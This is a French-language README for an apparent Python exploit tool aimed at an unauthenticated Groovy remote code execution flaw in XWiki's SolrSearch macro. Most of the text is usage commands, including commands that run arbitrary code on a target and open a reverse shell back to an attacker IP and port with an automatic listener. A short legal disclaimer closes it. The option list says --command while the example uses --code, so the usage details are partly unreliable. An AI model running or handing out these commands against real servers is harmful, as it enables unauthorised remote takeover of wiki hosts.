
Exploit RCE non authentifié XWiki pour shell inversé
Exploit RCE non authentifié pour XWiki
Les versions XWiki affectées contiennent une vulnérabilité d'exécution de code à distance due à une gestion non sécurisée des expressions Groovy dans la macro SolrSearch. Les attaquants non authentifiés peuvent exécuter du code Groovy arbitraire à distance et obtenir un shell inversé.
Cet exploit peut être utilisé pour exécuter du code sur la machine cible et peut également établir un shell inversé. Deux modes sont disponibles : interactif ou basé sur des paramètres. L'exploit peut démarrer automatiquement un écouteur ou en utiliser un existant.

python3 xwiki_groovy_rce.py
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
-h/--help: Afficher le menu d'aide
-u/--url: URL cible XWiki (obligatoire)
-r/--reverse-shell: Exécuter un shell inversé
-c/--command: Exécuter une seule commande
-i/--ip: Spécifier l'IP de l'écouteur (uniquement pour le shell inversé)
-p/--port: Spécifier le port de l'écouteur (uniquement pour le shell inversé, défaut=4444)
--no-listener: Ne pas démarrer d'écouteur (uniquement pour le shell inversé)
Cette preuve de concept est uniquement destinée à des fins éducatives et de tests autorisés.
L'utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale.
Les auteurs ne sont pas responsables de toute utilisation abusive de ces informations.